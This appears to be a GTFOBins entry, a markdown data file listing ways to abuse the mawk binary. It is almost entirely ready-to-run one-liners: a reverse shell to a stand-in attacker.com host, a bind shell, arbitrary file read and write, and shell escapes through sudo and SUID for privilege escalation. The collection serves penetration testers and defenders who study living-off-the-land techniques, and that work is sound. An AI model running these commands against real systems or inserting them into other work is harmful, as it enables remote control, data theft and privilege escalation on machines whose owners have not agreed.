GTFOBins.github.io/_gtfobins/mawk.md
2019-08-30 15:40:42 +02:00

1.2 KiB

functions
shell non-interactive-reverse-shell non-interactive-bind-shell file-write file-read sudo limited-suid
code
mawk 'BEGIN {system("/bin/sh")}'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 mawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 mawk -v LPORT=$LPORT 'BEGIN { s = "/inet/tcp/" LPORT "/0/0"; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
code
LFILE=file_to_write mawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
code
LFILE=file_to_read mawk '//' "$LFILE"
code
sudo mawk 'BEGIN {system("/bin/sh")}'
code
./mawk 'BEGIN {system("/bin/sh")}'